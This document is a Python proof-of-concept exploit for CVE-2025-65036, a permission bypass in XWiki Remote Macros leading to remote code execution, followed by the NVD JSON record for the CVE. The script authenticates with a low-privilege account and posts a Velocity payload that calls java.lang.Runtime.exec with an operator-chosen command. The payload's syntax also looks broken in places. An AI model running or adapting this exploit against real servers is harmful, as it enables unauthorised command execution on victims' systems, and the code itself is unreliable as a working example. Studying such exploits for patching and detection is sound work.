CVE-2025-65036

# CVE-2025-65036 PoC - XWiki Remote Macros Velocity RCE # This PoC demonstrates the permission bypass in Velocity macro execution import requests import sys TARGET_URL = "http://target-xwiki-instance.com" USERNAME = "attacker" PASSWORD = "password123" def exploit_cve_2025_65036(): """ Exploit for CVE-2025-65036: XWiki Remote Macros RCE via Velocity injection Requires low-privilege account to exploit """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/bin/login/XWiki/XWikiLogin" login_data = { "j_username": USERNAME, "j_password": PASSWORD } try: resp = session.post(login_url, data=login_data, timeout=10) if resp.status_code != 200: print("[-] Authentication failed") return False print("[+] Authenticated successfully") # Step 2: Create malicious macro with Velocity code execution # Using Velocity to execute system commands via Java reflection cmd = "whoami" # Change this to your target command payload = """ #set($exp = "".getClass().forName("java.lang.Runtime") #.getRuntime().exec(\"" + cmd + "\").getInputStream() #.bufferedReader().readLine()) $exp """ # Step 3: Submit malicious macro via Remote Macros endpoint exploit_url = f"{TARGET_URL}/bin/view/XWiki/RemoteMacros" exploit_data = { "macroName": "confluence-migration", "macroContent": payload, "action": "execute" } resp = session.post(exploit_url, data=exploit_data, timeout=15) if resp.status_code == 200: print("[+] Exploit sent - Check for command output") print(f"[+] Response: {resp.text[:500]}") return True else: print(f"[-] Exploit failed with status: {resp.status_code}") return False except requests.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("CVE-2025-65036 XWiki Remote Macros RCE Exploit") print("=" * 50) exploit_cve_2025_65036()

{"cve": {"id": "CVE-2025-65036", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:03.780", "lastModified": "2026-02-20T16:51:07.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to 1.27.1, the macro executes Velocity from the details pages without checking for permissions, which can lead to remote code execution. This vulnerability is fixed in 1.27.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:pro_macros:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.27.1", "matchCriteriaId": "251FF58B-3224-46CD-BF84-B504D9B463F9"}]}]}], "references": [{"url": "https://github.com/xwikisas/xwiki-pro-macros/security/advisories/GHSA-472x-fwh9-r82f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}